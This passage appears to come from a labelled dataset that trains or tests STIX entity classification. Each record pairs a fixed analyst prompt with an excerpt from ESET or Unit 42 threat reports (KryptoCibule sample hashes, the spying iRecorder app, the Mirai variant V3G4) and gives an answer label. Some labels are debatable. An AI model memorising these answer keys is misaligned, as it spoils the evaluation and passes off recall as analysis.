"input": "### Entity:\nSetup.exe\n\n---\n\n### Text Passage:\nSamples\nSHA-1 Filename ESET detection name\n---------\n3BCEF852639F85803974943FC34EFF2D6D7D916D armsvc.exe MSIL/KryptoCibule.A\n352743EBE6A0638CC0614216AD000B6A43C4D46E SystemArchitectureTranslation.exe MSIL/KryptoCibule.A\n70480D5F4CB10DE42DD2C863DDF57102BE6FA9E0 Updater.exe MSIL/KryptoCibule.A\n2E568CDF9B28824FBA1D7C16D8D0BE1D73A3FEBA Setup.exe MSIL/KryptoCibule.A\n",
"output": "INDICATOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\n3BCEF852639F85803974943FC34EFF2D6D7D916D\n\n---\n\n### Text Passage:\nSamples\nSHA-1 Filename ESET detection name\n---------\n3BCEF852639F85803974943FC34EFF2D6D7D916D armsvc.exe MSIL/KryptoCibule.A\n352743EBE6A0638CC0614216AD000B6A43C4D46E SystemArchitectureTranslation.exe MSIL/KryptoCibule.A\n70480D5F4CB10DE42DD2C863DDF57102BE6FA9E0 Updater.exe MSIL/KryptoCibule.A\n2E568CDF9B28824FBA1D7C16D8D0BE1D73A3FEBA Setup.exe MSIL/KryptoCibule.A\n",
"output": "INDICATOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\n2E568CDF9B28824FBA1D7C16D8D0BE1D73A3FEBA\n\n---\n\n### Text Passage:\nSamples\nSHA-1 Filename ESET detection name\n---------\n3BCEF852639F85803974943FC34EFF2D6D7D916D armsvc.exe MSIL/KryptoCibule.A\n352743EBE6A0638CC0614216AD000B6A43C4D46E SystemArchitectureTranslation.exe MSIL/KryptoCibule.A\n70480D5F4CB10DE42DD2C863DDF57102BE6FA9E0 Updater.exe MSIL/KryptoCibule.A\n2E568CDF9B28824FBA1D7C16D8D0BE1D73A3FEBA Setup.exe MSIL/KryptoCibule.A\n",
"output": "INDICATOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\n352743EBE6A0638CC0614216AD000B6A43C4D46E\n\n---\n\n### Text Passage:\nSamples\nSHA-1 Filename ESET detection name\n---------\n3BCEF852639F85803974943FC34EFF2D6D7D916D armsvc.exe MSIL/KryptoCibule.A\n352743EBE6A0638CC0614216AD000B6A43C4D46E SystemArchitectureTranslation.exe MSIL/KryptoCibule.A\n70480D5F4CB10DE42DD2C863DDF57102BE6FA9E0 Updater.exe MSIL/KryptoCibule.A\n2E568CDF9B28824FBA1D7C16D8D0BE1D73A3FEBA Setup.exe MSIL/KryptoCibule.A\n",
"output": "INDICATOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\nC&C\n\n---\n\n### Text Passage:\nOverview of the app\nAside from providing legitimate screen recording functionality, the malicious iRecorder can record surrounding audio from the device\u2019s microphone and upload it to the attacker\u2019s command and control (C&C) server. It can also exfiltrate files with extensions representing saved web pages, images, audio, video, and document files, and file formats used for compressing multiple files, from the device. The app\u2019s specific malicious behavior \u2013 exfiltrating microphone recordings and stealing files with specific extensions \u2013 tends to suggest that it is part of an espionage campaign. However, we were not able to attribute the app to any particular malicious group.\nAs a Google App Defense Alliance partner, ESET identified the most recent version of the application as malicious and promptly shared its findings with Google. Following our alert, the app was removed from the store.\n",
"output": "INFRASTRUCTURE"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\nESET\n\n---\n\n### Text Passage:\nOverview of the app\nAside from providing legitimate screen recording functionality, the malicious iRecorder can record surrounding audio from the device\u2019s microphone and upload it to the attacker\u2019s command and control (C&C) server. It can also exfiltrate files with extensions representing saved web pages, images, audio, video, and document files, and file formats used for compressing multiple files, from the device. The app\u2019s specific malicious behavior \u2013 exfiltrating microphone recordings and stealing files with specific extensions \u2013 tends to suggest that it is part of an espionage campaign. However, we were not able to attribute the app to any particular malicious group.\nAs a Google App Defense Alliance partner, ESET identified the most recent version of the application as malicious and promptly shared its findings with Google. Following our alert, the app was removed from the store.\n",
"output": "IDENTITY"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\nGoogle App Defense Alliance\n\n---\n\n### Text Passage:\nOverview of the app\nAside from providing legitimate screen recording functionality, the malicious iRecorder can record surrounding audio from the device\u2019s microphone and upload it to the attacker\u2019s command and control (C&C) server. It can also exfiltrate files with extensions representing saved web pages, images, audio, video, and document files, and file formats used for compressing multiple files, from the device. The app\u2019s specific malicious behavior \u2013 exfiltrating microphone recordings and stealing files with specific extensions \u2013 tends to suggest that it is part of an espionage campaign. However, we were not able to attribute the app to any particular malicious group.\nAs a Google App Defense Alliance partner, ESET identified the most recent version of the application as malicious and promptly shared its findings with Google. Following our alert, the app was removed from the store.\n",
"output": "IDENTITY"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\nGoogle\n\n---\n\n### Text Passage:\nOverview of the app\nAside from providing legitimate screen recording functionality, the malicious iRecorder can record surrounding audio from the device\u2019s microphone and upload it to the attacker\u2019s command and control (C&C) server. It can also exfiltrate files with extensions representing saved web pages, images, audio, video, and document files, and file formats used for compressing multiple files, from the device. The app\u2019s specific malicious behavior \u2013 exfiltrating microphone recordings and stealing files with specific extensions \u2013 tends to suggest that it is part of an espionage campaign. However, we were not able to attribute the app to any particular malicious group.\nAs a Google App Defense Alliance partner, ESET identified the most recent version of the application as malicious and promptly shared its findings with Google. Following our alert, the app was removed from the store.\n",
"output": "IDENTITY"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\nespionage campaign\n\n---\n\n### Text Passage:\nOverview of the app\nAside from providing legitimate screen recording functionality, the malicious iRecorder can record surrounding audio from the device\u2019s microphone and upload it to the attacker\u2019s command and control (C&C) server. It can also exfiltrate files with extensions representing saved web pages, images, audio, video, and document files, and file formats used for compressing multiple files, from the device. The app\u2019s specific malicious behavior \u2013 exfiltrating microphone recordings and stealing files with specific extensions \u2013 tends to suggest that it is part of an espionage campaign. However, we were not able to attribute the app to any particular malicious group.\nAs a Google App Defense Alliance partner, ESET identified the most recent version of the application as malicious and promptly shared its findings with Google. Following our alert, the app was removed from the store.\n",
"output": "CAMPAIGN"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\niRecorder\n\n---\n\n### Text Passage:\nOverview of the app\nAside from providing legitimate screen recording functionality, the malicious iRecorder can record surrounding audio from the device\u2019s microphone and upload it to the attacker\u2019s command and control (C&C) server. It can also exfiltrate files with extensions representing saved web pages, images, audio, video, and document files, and file formats used for compressing multiple files, from the device. The app\u2019s specific malicious behavior \u2013 exfiltrating microphone recordings and stealing files with specific extensions \u2013 tends to suggest that it is part of an espionage campaign. However, we were not able to attribute the app to any particular malicious group.\nAs a Google App Defense Alliance partner, ESET identified the most recent version of the application as malicious and promptly shared its findings with Google. Following our alert, the app was removed from the store.\n",
"output": "MALWARE"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\nV3G4\n\n---\n\n### Text Passage:\nMirai Variant V3G4 Targets IoT Devices\nAdvanced DNS Security Advanced Threat PreventionAdvanced URL FilteringAdvanced WildFireCloud-Delivered Security ServicesIoT SecurityNext-Generation Firewall\nContent Warning\nWe are providing a content warning because the following contains usage of a racial slur by a threat actor, which is not condoned in any instance by Unit 42. Unit 42 has partially redacted the racial slur to provide researchers with the ability to identify it and check IoCs as needed.\n",
"output": "MALWARE"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\nUnit 42\n\n---\n\n### Text Passage:\nMirai Variant V3G4 Targets IoT Devices\nAdvanced DNS Security Advanced Threat PreventionAdvanced URL FilteringAdvanced WildFireCloud-Delivered Security ServicesIoT SecurityNext-Generation Firewall\nContent Warning\nWe are providing a content warning because the following contains usage of a racial slur by a threat actor, which is not condoned in any instance by Unit 42. Unit 42 has partially redacted the racial slur to provide researchers with the ability to identify it and check IoCs as needed.\n",
"output": "IDENTITY"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\nWildFire\n\n---\n\n### Text Passage:\nMirai Variant V3G4 Targets IoT Devices\nAdvanced DNS Security Advanced Threat PreventionAdvanced URL FilteringAdvanced WildFireCloud-Delivered Security ServicesIoT SecurityNext-Generation Firewall\nContent Warning\nWe are providing a content warning because the following contains usage of a racial slur by a threat actor, which is not condoned in any instance by Unit 42. Unit 42 has partially redacted the racial slur to provide researchers with the ability to identify it and check IoCs as needed.\n",
"output": "TOOL"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", 